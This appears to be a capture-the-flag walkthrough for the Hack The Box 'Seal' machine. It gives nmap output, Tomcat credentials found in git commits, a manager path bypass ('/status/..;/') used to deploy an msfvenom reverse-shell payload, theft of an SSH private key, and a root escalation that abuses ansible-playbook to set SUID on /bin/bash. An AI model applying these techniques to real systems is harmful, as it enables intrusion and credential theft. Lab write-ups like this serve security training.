In this post, I would like to share a walkthrough of the Seal Machine.
This room has been considered difficulty rated as a medium machine
Information Gathering on Seal Machine
Once we have started the VPN connection, we can start the information gathering on the machine by executing the command nmap -sC -sV -p- <IP Address> -PN
<strong># Nmap 7.91 scan initiated Mon Jul 12 21:30:43 2021 as: nmap -sC -sV -oA intial -Pn 10.10.10.250 Nmap scan report for seal.htb (10.10.10.250) Host is up (0.22s latency) Not shown: 997 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 4b:89:47:39:67:3d:07:31:5e:3f:4c:27:41:1f:f9:67 (RSA) | 256 04:a7:4f:39:95:65:c5:b0:8d:d5:49:2e:d8:44:00:36 (ECDSA) |_ 256 b4:5e:83:93:c5:42:49:de:71:25:92:71:23:b1:85:54 (ED25519) 443/tcp open ssl/http nginx 1.18.0 (Ubuntu) |_http-server-header: nginx/1.18.0 (Ubuntu) |_http-title: Seal Market | ssl-cert: Subject: commonName=seal.htb/organizationName=Seal Pvt Ltd/stateOrProvinceName=London/countryName=UK | Not valid before: 2021-05-05T10:24:03 |_Not valid after: 2022-05-05T10:24:03 | tls-alpn: |_ http/1.1 | tls-nextprotoneg: |_ http/1.1 8080/tcp open http-proxy | fingerprint-strings: | FourOhFourRequest: | HTTP/1.1 401 Unauthorized | Date: Tue, 13 Jul 2021 01:44:48 GMT | Set-Cookie: JSESSIONID=node0hnabifqaxoy718gb842iywilt193.node0; Path=/; HttpOnly | Expires: Thu, 01 Jan 1970 00:00:00 GMT | Content-Type: text/html;charset=utf-8 | Content-Length: 0 | GetRequest: | HTTP/1.1 401 Unauthorized | Date: Tue, 13 Jul 2021 01:44:46 GMT | Set-Cookie: JSESSIONID=node0ba5l1frprgu2fwdfykhazky6191.node0; Path=/; HttpOnly | Expires: Thu, 01 Jan 1970 00:00:00 GMT | Content-Type: text/html;charset=utf-8 | Content-Length: 0 | HTTPOptions: | HTTP/1.1 200 OK | Date: Tue, 13 Jul 2021 01:44:47 GMT | Set-Cookie: JSESSIONID=node016ot8bocmvot7y8baiml78ulf192.node0; Path=/; HttpOnly | Expires: Thu, 01 Jan 1970 00:00:00 GMT | Content-Type: text/html;charset=utf-8 | Allow: GET,HEAD,POST,OPTIONS | Content-Length: 0 | RPCCheck: | HTTP/1.1 400 Illegal character OTEXT=0x80 | Content-Type: text/html;charset=iso-8859-1 | Content-Length: 71 | Connection: close | <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre> | RTSPRequest: | HTTP/1.1 505 Unknown Version | Content-Type: text/html;charset=iso-8859-1 | Content-Length: 58 | Connection: close | <h1>Bad Message 505</h1><pre>reason: Unknown Version</pre> | Socks4: | HTTP/1.1 400 Illegal character CNTL=0x4 | Content-Type: text/html;charset=iso-8859-1 | Content-Length: 69 | Connection: close | <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x4</pre> | Socks5: | HTTP/1.1 400 Illegal character CNTL=0x5 | Content-Type: text/html;charset=iso-8859-1 | Content-Length: 69 | Connection: close |_ <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x5</pre> | http-auth: | HTTP/1.1 401 Unauthorized\x0D |_ Server returned status 401 but no WWW-Authenticate header. |_http-title: Site doesn't have a title (text/html;charset=utf-8). 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port8080-TCP:V=7.91%I=7%D=7/12%Time=60ECED14%P=x86_64-pc-linux-gnu%r(Ge SF:tRequest,F5,"HTTP/1\.1\x20401\x20Unauthorized\r\nDate:\x20Tue,\x2013\x2 SF:0Jul\x202021\x2001:44:46\x20GMT\r\nSet-Cookie:\x20JSESSIONID=node0ba5l1 SF:frprgu2fwdfykhazky6191\.node0;\x20Path=/;\x20HttpOnly\r\nExpires:\x20Th SF:u,\x2001\x20Jan\x201970\x2000:00:00\x20GMT\r\nContent-Type:\x20text/htm SF:l;charset=utf-8\r\nContent-Length:\x200\r\n\r\n")%r(HTTPOptions,10A,"HT SF:TP/1\.1\x20200\x20OK\r\nDate:\x20Tue,\x2013\x20Jul\x202021\x2001:44:47\ SF:x20GMT\r\nSet-Cookie:\x20JSESSIONID=node016ot8bocmvot7y8baiml78ulf192\. SF:node0;\x20Path=/;\x20HttpOnly\r\nExpires:\x20Thu,\x2001\x20Jan\x201970\ SF:x2000:00:00\x20GMT\r\nContent-Type:\x20text/html;charset=utf-8\r\nAllow SF::\x20GET,HEAD,POST,OPTIONS\r\nContent-Length:\x200\r\n\r\n")%r(RTSPRequ SF:est,AD,"HTTP/1\.1\x20505\x20Unknown\x20Version\r\nContent-Type:\x20text SF:/html;charset=iso-8859-1\r\nContent-Length:\x2058\r\nConnection:\x20clo SF:se\r\n\r\n<h1>Bad\x20Message\x20505</h1><pre>reason:\x20Unknown\x20Vers SF:ion</pre>")%r(FourOhFourRequest,F6,"HTTP/1\.1\x20401\x20Unauthorized\r\ SF:nDate:\x20Tue,\x2013\x20Jul\x202021\x2001:44:48\x20GMT\r\nSet-Cookie:\x SF:20JSESSIONID=node0hnabifqaxoy718gb842iywilt193\.node0;\x20Path=/;\x20Ht SF:tpOnly\r\nExpires:\x20Thu,\x2001\x20Jan\x201970\x2000:00:00\x20GMT\r\nC SF:ontent-Type:\x20text/html;charset=utf-8\r\nContent-Length:\x200\r\n\r\n SF:")%r(Socks5,C3,"HTTP/1\.1\x20400\x20Illegal\x20character\x20CNTL=0x5\r\ SF:nContent-Type:\x20text/html;charset=iso-8859-1\r\nContent-Length:\x2069 SF:\r\nConnection:\x20close\r\n\r\n<h1>Bad\x20Message\x20400</h1><pre>reas SF:on:\x20Illegal\x20character\x20CNTL=0x5</pre>")%r(Socks4,C3,"HTTP/1\.1\ SF:x20400\x20Illegal\x20character\x20CNTL=0x4\r\nContent-Type:\x20text/htm SF:l;charset=iso-8859-1\r\nContent-Length:\x2069\r\nConnection:\x20close\r SF:\n\r\n<h1>Bad\x20Message\x20400</h1><pre>reason:\x20Illegal\x20characte SF:r\x20CNTL=0x4</pre>")%r(RPCCheck,C7,"HTTP/1\.1\x20400\x20Illegal\x20cha SF:racter\x20OTEXT=0x80\r\nContent-Type:\x20text/html;charset=iso-8859-1\r SF:\nContent-Length:\x2071\r\nConnection:\x20close\r\n\r\n<h1>Bad\x20Messa SF:ge\x20400</h1><pre>reason:\x20Illegal\x20character\x20OTEXT=0x80</pre>" SF:); Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Mon Jul 12 21:32:32 2021 -- 1 IP address (1 host up) scanned in 109.27 seconds</strong>
We need to whitelist the domain name for the machine such as seal.htb
Let’s open the browser and straight into the website interface.
We didn’t see any useful information appear on the website interface.
Let’s access the website via port 8080 and the website interface will look like shown in the screenshot above.
There’s a create one for us to create a new account
Gaining Privileges Access on Seal Machine
Finally, we have managed to log into the Dashboard which the interface will look as above.
From the normal website previously, we notice that the web title called “Seal Market“
The website will open the Seal Market App which the developer has done 13 commits to the application.
Without further ado, let’s open the commits page and see the content of the page.
I have managed to analyze the commits which appear here and there is one file (the code starts with ac210325af) that stood up compared to other files
I have found a tomcat folder within the commits that we open previously
There should be a file configuration that is saved as tomcat-users.xml which it might contain the username and password for the website
Finally, the username and password have been revealing on the configuration of tomcat-user.yml
From the Tomcat configuration, we notice there’s a manager-GUI that might lead to /manager/ directory. Let’s access the website via the credentials that we found previously
As a result, we did manage to gain access to Tomcat Web Application Manager. A malicious file will be needed to be uploaded on the website interface for future purposes.
However, we need to start our NC listener after we create a malicious file on our machine in order to get the reverse shell.
The upload process will look something as shown in the screenshot above.
We should inspect the packet from our BurpSuite Community tools after you click the deploy button.
We need to modify the packet where we should adding /status/..;/ before html and after manager directory. Next, we can click the forward button in order to send the packet to the server.
As a result, the file has been successfully saved on the Dashboard as shown in the screenshot above. In order to obtain the connection back to us, we need to click on the file (the same file that we save during the msfvenom activity)
When we look back on the reserve shell terminal, the connection has been returned back to us.
Maintaining Privileges Access
Let’s see which directory did we access it.
We need to look at /opt/backups/ directory where we sighted that playbook directory
Let’s read the content that has been stored within the run.yml file.
We managed to find a directory that we can use for further escalation to obtain a user flag.
No file is stored within the uploads directory.
Without further ado, We should be able to retrieve luis by executing the command “ls -n /home/luis/.ssh/id_rsa /var/lib/tomat9/webapps/ROOT/admin/dashboard/uploads“
In the end, we managed to get id_rsa on the uploads directory but it’s unreadable in that directory. Due to that, we should be moving that file into /tmp directory
After that, we can copy-paste the id_rsa into our attacker’s machine where you will able to access the machine via ssh service.
Before we managed to log into the machine via ssh service, we need to give permission 600 to the id_rsa
We should be able to read the user flag by executing the command “cat user.txt”
Escalate to Root Privileges Access
By running sudo -l command, we will manage to get SUID access to the machine. We can abuse the ansible-playbook assigned to root
We need to create the file (anyname.yml) which contains the following code
- hosts: localhost tasks: - name: darknite command: "chmod +s /bin/bash"
In order to get root privileges access, we should execute the command “sudo /usr/bin/ansible-playbook anyname.yml“
Voila! We have been able to get root privileges to access the machine
We can read teh root flag by executing “cat root.txt” command